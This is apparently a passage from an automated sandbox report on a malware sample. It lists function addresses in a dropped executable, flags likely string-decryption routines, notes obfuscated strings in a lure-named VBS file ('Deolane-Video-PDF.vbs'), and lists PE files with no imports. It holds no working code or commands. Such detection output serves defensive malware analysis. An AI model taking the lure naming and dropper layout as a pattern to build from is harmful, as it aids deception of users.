Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83146E92 24_2_00007FFD83146E92
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314298C 24_2_00007FFD8314298C
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83146532 24_2_00007FFD83146532
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832749D0 24_2_00007FFD832749D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83146429 24_2_00007FFD83146429
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142937 24_2_00007FFD83142937
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143099 24_2_00007FFD83143099
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83146000 24_2_00007FFD83146000
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143742 24_2_00007FFD83143742
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83145894 24_2_00007FFD83145894
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144016 24_2_00007FFD83144016
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141E7E 24_2_00007FFD83141E7E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141AF0 24_2_00007FFD83141AF0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314452F 24_2_00007FFD8314452F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83274CE0 24_2_00007FFD83274CE0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831424AA 24_2_00007FFD831424AA
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831449A8 24_2_00007FFD831449A8
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141839 24_2_00007FFD83141839
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8315D260 24_2_00007FFD8315D260
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831445CA 24_2_00007FFD831445CA
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832712B0 24_2_00007FFD832712B0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832F52F0 24_2_00007FFD832F52F0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141C26 24_2_00007FFD83141C26
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83165200 24_2_00007FFD83165200
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143E27 24_2_00007FFD83143E27
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831471D5 24_2_00007FFD831471D5
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142E0F 24_2_00007FFD83142E0F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142766 24_2_00007FFD83142766
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314732E 24_2_00007FFD8314732E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142F31 24_2_00007FFD83142F31
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143C01 24_2_00007FFD83143C01
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142E37 24_2_00007FFD83142E37
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83145BD2 24_2_00007FFD83145BD2
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143EEA 24_2_00007FFD83143EEA
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831411CC 24_2_00007FFD831411CC
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143765 24_2_00007FFD83143765
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314227F 24_2_00007FFD8314227F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314242D 24_2_00007FFD8314242D
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144BAB 24_2_00007FFD83144BAB
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83279A80 24_2_00007FFD83279A80
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83146BBD 24_2_00007FFD83146BBD
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832F5AA0 24_2_00007FFD832F5AA0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831437F1 24_2_00007FFD831437F1
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831435DF 24_2_00007FFD831435DF
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831451E1 24_2_00007FFD831451E1
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831424AF 24_2_00007FFD831424AF
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142D65 24_2_00007FFD83142D65
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83275E90 24_2_00007FFD83275E90
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831436DE 24_2_00007FFD831436DE
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83146244 24_2_00007FFD83146244
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142347 24_2_00007FFD83142347
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314592F 24_2_00007FFD8314592F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314309E 24_2_00007FFD8314309E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142A95 24_2_00007FFD83142A95
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314489A 24_2_00007FFD8314489A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142590 24_2_00007FFD83142590
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314692E 24_2_00007FFD8314692E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144138 24_2_00007FFD83144138
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314655F 24_2_00007FFD8314655F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144DB3 24_2_00007FFD83144DB3
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83146014 24_2_00007FFD83146014
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142B30 24_2_00007FFD83142B30
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144430 24_2_00007FFD83144430
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314105F 24_2_00007FFD8314105F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314672B 24_2_00007FFD8314672B
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141EB5 24_2_00007FFD83141EB5
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832766A0 24_2_00007FFD832766A0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831419DD 24_2_00007FFD831419DD
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83145213 24_2_00007FFD83145213
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832DE570 24_2_00007FFD832DE570
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144E8A 24_2_00007FFD83144E8A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141AE6 24_2_00007FFD83141AE6
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83222510 24_2_00007FFD83222510
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831412A8 24_2_00007FFD831412A8
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831451E6 24_2_00007FFD831451E6
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831434B3 24_2_00007FFD831434B3
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143EAE 24_2_00007FFD83143EAE
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141BCC 24_2_00007FFD83141BCC
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8322A9D0 24_2_00007FFD8322A9D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831465AA 24_2_00007FFD831465AA
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83146A0F 24_2_00007FFD83146A0F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831460EB 24_2_00007FFD831460EB
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141F78 24_2_00007FFD83141F78
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142117 24_2_00007FFD83142117
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83145236 24_2_00007FFD83145236
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144B83 24_2_00007FFD83144B83
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8315EF00 24_2_00007FFD8315EF00
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142676 24_2_00007FFD83142676
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8327ED80 24_2_00007FFD8327ED80
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8326EE10 24_2_00007FFD8326EE10
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831460F0 24_2_00007FFD831460F0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142A2C 24_2_00007FFD83142A2C
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143EBD 24_2_00007FFD83143EBD
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144660 24_2_00007FFD83144660
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314188E 24_2_00007FFD8314188E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142518 24_2_00007FFD83142518
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831448DB 24_2_00007FFD831448DB
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8315F200 24_2_00007FFD8315F200
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8315F060 24_2_00007FFD8315F060
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832DB150 24_2_00007FFD832DB150
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831412C1 24_2_00007FFD831412C1
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831411DB 24_2_00007FFD831411DB
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314402F 24_2_00007FFD8314402F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8316B850 24_2_00007FFD8316B850
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144B33 24_2_00007FFD83144B33
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832DF6D0 24_2_00007FFD832DF6D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8326B590 24_2_00007FFD8326B590
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142BCB 24_2_00007FFD83142BCB
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143DC8 24_2_00007FFD83143DC8
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142833 24_2_00007FFD83142833
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141B77 24_2_00007FFD83141B77
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8316B4C0 24_2_00007FFD8316B4C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83145BA5 24_2_00007FFD83145BA5
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832F3BE0 24_2_00007FFD832F3BE0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD832DBAD0 24_2_00007FFD832DBAD0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8327FB40 24_2_00007FFD8327FB40
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83377970 24_2_00007FFD83377970
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831AFA00 24_2_00007FFD831AFA00
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142509 24_2_00007FFD83142509
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143C24 24_2_00007FFD83143C24
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314380F 24_2_00007FFD8314380F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314135C 24_2_00007FFD8314135C
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831471A8 24_2_00007FFD831471A8
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8314514B 24_2_00007FFD8314514B
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8326BF30 24_2_00007FFD8326BF30
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8315BF20 24_2_00007FFD8315BF20
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8315BD60 24_2_00007FFD8315BD60
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142BF8 24_2_00007FFD83142BF8
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83143869 24_2_00007FFD83143869
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83141B9A 24_2_00007FFD83141B9A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83142013 24_2_00007FFD83142013
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838D9449 24_2_00007FFD838D9449
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838CC3A0 24_2_00007FFD838CC3A0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83907318 24_2_00007FFD83907318
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838E616A 24_2_00007FFD838E616A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8393E158 24_2_00007FFD8393E158
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838D4070 24_2_00007FFD838D4070
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83933064 24_2_00007FFD83933064
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838D90C8 24_2_00007FFD838D90C8
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8395E0B0 24_2_00007FFD8395E0B0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838D00C4 24_2_00007FFD838D00C4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838E180B 24_2_00007FFD838E180B
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838D9820 24_2_00007FFD838D9820
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838EA7C0 24_2_00007FFD838EA7C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838DB6B0 24_2_00007FFD838DB6B0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838C86DA 24_2_00007FFD838C86DA
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838E7610 24_2_00007FFD838E7610
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838E1574 24_2_00007FFD838E1574
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838DA5A8 24_2_00007FFD838DA5A8
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838F35A0 24_2_00007FFD838F35A0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838CD5A0 24_2_00007FFD838CD5A0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838DD5D0 24_2_00007FFD838DD5D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838CC5C9 24_2_00007FFD838CC5C9
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838D8510 24_2_00007FFD838D8510
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838D0550 24_2_00007FFD838D0550
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838D7C40 24_2_00007FFD838D7C40
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83976BCC 24_2_00007FFD83976BCC
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838E7BDC 24_2_00007FFD838E7BDC
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFD839E1C0D appears 119 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFD839E5DEE appears 738 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFD839E2072 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFDA3551023 appears 575 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFD839E4106 appears 385 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFD839E1FC8 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFD839E4697 appears 138 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFD839E1055 appears 1559 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFD839E4205 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFDA35BC50F appears 194 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFDA35BC5A5 appears 103 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FFD839E2004 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: String function: 00007FF7ADC12770 appears 82 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD83141C0D appears 119 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FF643AB2770 appears 82 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD9331C50F appears 194 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD9331C5A5 appears 103 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD83141055 appears 1559 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD83144205 appears 47 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD83144697 appears 138 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD83142004 appears 31 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD83145DEE appears 738 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD83142072 appears 82 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD83144106 appears 385 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD932B1023 appears 575 times
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: String function: 00007FFD83141FC8 appears 55 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Deolane-Video-PDF.vbs Initial sample: Strings found which are bigger than 50
PE file does not import any functions
Source: api-ms-win-crt-environment-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-fibers-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: python3.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-fibers-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: python3.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
